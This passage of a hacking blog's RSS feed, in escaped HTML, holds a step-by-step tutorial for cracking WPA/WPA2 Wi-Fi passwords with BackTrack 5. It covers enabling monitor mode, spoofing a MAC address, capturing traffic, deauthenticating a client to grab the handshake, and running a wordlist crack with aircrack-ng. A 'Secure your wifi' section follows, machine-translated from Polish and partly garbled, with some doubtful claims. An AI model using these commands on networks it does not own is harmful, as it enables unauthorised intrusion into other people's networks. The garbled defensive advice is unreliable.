justify;"&gt;Vmware Workstation&lt;a href="http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml" target="_blank"&gt;(Download)&lt;/a&gt; &lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;h3 style="text-align: justify;"&gt;Backtrek 5 (&lt;a href="http://www.backtrack-linux.org/downloads/" target="_blank"&gt;Download&lt;/a&gt;)&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;h3 style="text-align: justify;"&gt;Compatible Wifi Card (Optional)&amp;nbsp;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3 style="text-align: justify;"&gt;&lt;span style="font-size: x-large;"&gt;Rules to follow&amp;nbsp; &lt;/span&gt;&lt;/h3&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;1.Now you First install a Vmware &amp;nbsp; in your system.&lt;br /&gt;2. Then you create a virtual machine in your Vmware.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZBdaZnBOEJtj3aFW38QoTaZL60E7VdRrWI30aNbYZZiyislhj-FzDCkc9AqKQGNaoGL0IXJTAOYrTsKD7mmzxRv7Mst3YcHxrQFiMP-nJYJHUjuYNz5n8Nqqgbb73wwXbmbvjWW5q9UAa/s1600/vm3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZBdaZnBOEJtj3aFW38QoTaZL60E7VdRrWI30aNbYZZiyislhj-FzDCkc9AqKQGNaoGL0IXJTAOYrTsKD7mmzxRv7Mst3YcHxrQFiMP-nJYJHUjuYNz5n8Nqqgbb73wwXbmbvjWW5q9UAa/s1600/vm3.png" height="179" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;3.Then power on your machine. &lt;br /&gt;4.And&amp;nbsp; Now your all set to go...just simply follow below steps...now&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3awEga3A4prdmAaFfRMrAfj4QzddIFQ_wow_yoX0n4glungisy44olWhqoRz3OEHXIQfzUyW-MAA2ibmS6wq4daid1FQ5-zys_kAZ9rhMut5ynORDUBqMZ1dyEjuAPLNehPLjjj5gviNb/s1600/vm6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3awEga3A4prdmAaFfRMrAfj4QzddIFQ_wow_yoX0n4glungisy44olWhqoRz3OEHXIQfzUyW-MAA2ibmS6wq4daid1FQ5-zys_kAZ9rhMut5ynORDUBqMZ1dyEjuAPLNehPLjjj5gviNb/s1600/vm6.png" height="358" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;Steps to Follow&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;airmon-ng&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;The result will be something like :&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;code&gt;wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel 5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;airmon-ng start wlan0&lt;/span&gt;&lt;/code&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;(Optional) Change the mac address of the mon0 interface.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;ifconfig mon0 down&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;h3&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;"&gt;&lt;code&gt;macchanger -m 00:11:22:33:44:55 mon0&lt;/code&gt;&lt;br /&gt;&lt;code&gt;ifconfig mon0 up&lt;/code&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;airodump-ng mon0&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;br /&gt;Then, press "&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;Ctrl+c&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;" to break the program.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0&lt;/span&gt;&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;*where -c is the channel&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -w is the file to be written&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; --bssid is the BSSID&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;This terminal is keeping running.&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;open another terminal.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;code&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0&lt;/span&gt;&lt;/code&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;*where -a is the BSSID&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c is the client MAC address (STATION)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;Wait for the handshake&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;Use the John the Ripper as word list to crack the WPA/WP2 password &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;You can&amp;nbsp; use your own password wordlist. &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;h3&gt;&lt;span style="color: lime;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&amp;nbsp;&lt;span style="font-size: large;"&gt;Secure your wifi &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;b&gt;&lt;span title="1."&gt;1. &amp;nbsp;&lt;/span&gt;&lt;span title="Wybór szyfrowania"&gt;Choice encrypt&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;b&gt;&lt;span title="Wybór szyfrowania"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Wybór szyfrowania"&gt;&lt;span title="Prosta sprawa."&gt;A simple matter . &lt;/span&gt;&lt;span title="Szyfrowanie WEP można złamać w kilka minut, a WPA jest dość słabsze niż WPA2."&gt;WEP can be cracked in a few minutes, and WPA is relatively weaker than WPA2 . &lt;/span&gt;&lt;span title="Wybieramy WPA2."&gt;Choose WPA2 .&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Nie WEP, nie WPA."&gt;No WEP, not WPA . &lt;/span&gt;&lt;span title="Koniec, kropka."&gt;End of story .&lt;br /&gt;WPA2 networks can only attack dictionary attacks , so ...&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Koniec, kropka."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="2."&gt;&lt;b&gt;2. &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span title="Ustalenie silnego hasła"&gt;&lt;b&gt;Setting a strong password&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Ustalenie silnego hasła"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span title="Standard WPA2 wymusza od nas użycie co najmniej 8 znakowego hasła, co już samo w sobie jest dobre, jednakże każdy kolejny znak zwiększa bezpieczeństwo w tempie wykładniczym, czyli z każdym kolejnym znakiem pula wszystkich możliwych do wygenerowania haseł o tej długości ogromnie rośnie."&gt;WPA2  forces us to use at least 8 character password , which in itself is  good , but each character increases security exponentially , that is,  with each a pool of all possible to generate passwords of this length  greatly increases. &lt;/span&gt;&lt;span title="Dlatego naprawdę robi różnicę to, czy użyjemy hasła o 8, czy o 9 znakach."&gt;So it really makes a difference whether you use a password of 8 or a 9 characters.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Ustalenie silnego hasła"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="3."&gt;&lt;b&gt;3.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span title="Zmiana domyślnej nazwy sieci (SSID)"&gt;&lt;b&gt;Change the default network name ( SSID)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Zmiana domyślnej nazwy sieci (SSID)"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span title="Trzeba pamiętać, by nigdy nie zostawiać domyślnej nazwy sieci, takiej jak „Netgear” czy „Asus”."&gt;You have to remember to never leave the default network name , such as " Netgear " and " Asus " . &lt;/span&gt;&lt;span title="Włamywacze często noszą ze sobą tzw."&gt;Attackers often carry with them so . &lt;/span&gt;&lt;span title="tęczowe tablice, dzięki którym złamanie hasła WPA/WPA2 do sieci o takiej nazwie trwa dosłownie kilka minut."&gt;rainbow tables , so that breaking WPA/WPA2 password for the network with the same name takes just a few minutes. &lt;/span&gt;&lt;span title="(wyjaśniłem to dokładnie w artykule o działaniu szyfrowania WPA/WPA2)"&gt;( This is explained in detail in the operation of WPA/WPA2 )&lt;/span&gt;&lt;/span&gt;&lt;span title="Jeśli wykażecie się weną, lub też jako SSID ustawicie losowy ciąg znaków (nie polecam), utrudnicie crackerom życie."&gt;If a list of the vein , or as the SSID you set a random string of characters (not recommended ) , crackers utrudnicie life.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Jeśli wykażecie się weną, lub też jako SSID ustawicie losowy ciąg znaków (nie polecam), utrudnicie crackerom życie."&gt;&lt;span class="" lang="en"&gt;&lt;span title="4."&gt;&lt;b&gt;4.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span title="Zmiana hasła do routera"&gt;&lt;b&gt;Change the password to the router&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Zmiana hasła do routera"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span title="Załóżmy, że ktoś już włamał się do waszej sieci."&gt;Suppose that someone has hacked into your network. &lt;/span&gt;&lt;span title="Najczęściej pod adresem 192.168.1.1 (lub podobnym) znajduje się panel sterowania routera, w którym można zrobić cokolwiek: zmienić hasło do sieci, zmienić jej nazwę, wyłączyć ją i inne."&gt;Most  at 192.168.1.1 ( or similar ) is the router control panel where you can  do anything : change the password for your network , change the name ,  disable it , and more.&lt;/span&gt;&lt;/span&gt;&lt;span title="Bardzo często sam router zabezpieczony jest loginem i hasłem (admin, admin), co nie stanowi dużej przeszkody dla włamywacza."&gt;Very  often, the router itself is protected by a username and password (admin  , admin ) , which is not a big obstacle for burglars . &lt;/span&gt;&lt;span title="Także warto pamiętać, by zmieniać domyślne parametry wszędzie tam, gdzie to możliwe."&gt;Also keep in mind to change the defaults wherever possible.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Także warto pamiętać, by zmieniać domyślne parametry wszędzie tam, gdzie to możliwe."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="5."&gt;&lt;b&gt;5.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span title="Ograniczenie zasięgu sieci"&gt;&lt;b&gt;Limiting coverage&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Ograniczenie zasięgu sieci"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span title="Najwięcej włamań do sieci WiFi następuje „z zewnątrz”."&gt;Most WiFi intrusions followed by " outsiders" . &lt;/span&gt;&lt;span title="Na osiedlu bezprzewodowa karta sieciowa wykrywa mnóstwo potencjalnych ofiar, najczęściej z mieszkań koło nas lub z pobliskich budynków."&gt;The  neighborhood wireless network card detects a lot of potential victims ,  most of the apartments around us or from nearby buildings.&lt;/span&gt;&lt;/span&gt;&lt;span title="Zasięg sieci WiFi powinien być dobrany tak, aby obejmował cały dom, lecz nic poza tym."&gt;WiFi network coverage should be chosen so as to cover the whole house , but nothing else. &lt;/span&gt;&lt;span title="Uniemożliwi to jakiekolwiek niechciane akcje."&gt;This will prevent any unwanted shares . &lt;/span&gt;&lt;span title="Najczęściej w opcjach routera można ustawić moc nadajnika."&gt;Frequently in the options you can set the router transmitter power .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Najczęściej w opcjach routera można ustawić moc nadajnika."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="6."&gt;&lt;b&gt;6.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span title="Filtrowanie MAC / ukrycie SSID"&gt;&lt;b&gt;Filtering MAC / hide the SSID&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="zoom: 1;"&gt;&lt;span class="" lang="en"&gt;&lt;span title="Filtrowanie MAC / ukrycie SSID"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span title="Wszyscy w Sieci mówią, by nie stosować ww."&gt;All the networks are saying not to use the above . &lt;/span&gt;&lt;span title="technik, ponieważ są one bardzo łatwe do złamania."&gt;techniques , as they are very easy to break. &lt;/span&gt;&lt;span title="To oczywiście prawda, ale… dlaczego by nie utrudniać życia crackerom?"&gt;It is of course true, but ... why not hinder life crackers ? &lt;/span&gt;&lt;span title=":)"&gt;:)&lt;/span&gt;&lt;/span&gt;&lt;span title="Nawiasem mówiąc, gdy wyjedziemy na wakacje i zapomnimy wyłączyć routera, a sieć będzie sobie istniała pusta w eterze, ukrycie SSID lub filtrowanie adresów MAC jest nie-do-obejścia."&gt;By  the way, when we go on vacation and forget to turn off the router and  the network is empty there in the ether , hiding the SSID and MAC  address filtering is a not - for - workaround. &lt;/span&gt;&lt;span title="Nie możemy podszpiegować, kto loguje się do sieci i zmienić swój adres MAC na jego, bo nikt nie loguje się do sieci."&gt;We can not podszpiegować who logs on to the network and change your MAC address on him, because no one logs on to the network. &lt;/span&gt;&lt;span title="Tak samo nie możemy użyć ataku cofnięcia uwierzytelnienia, by sprawdzić ukrytą nazwę sieci, ponieważ nie ma na kim przeprowadzić tego ataku."&gt;Likewise, we can not use the attack revoke credentials to check a hidden network name , because it is who perform the attack .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;&lt;h3 style="text-align: justify;"&gt; &lt;/h3&gt;&lt;div class="goog-inline-block" style="margin-top: 5px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZBdaZnBOEJtj3aFW38QoTaZL60E7VdRrWI30aNbYZZiyislhj-FzDCkc9AqKQGNaoGL0IXJTAOYrTsKD7mmzxRv7Mst3YcHxrQFiMP-nJYJHUjuYNz5n8Nqqgbb73wwXbmbvjWW5q9UAa/s72-c/vm3.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title/><link>http://bambahacks.blogspot.com/2013/11/call-of-duty-pc-game-highly-compressed.html</link><category>PC Game</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 18 Nov 2013 20:20:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-829795684769322352</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
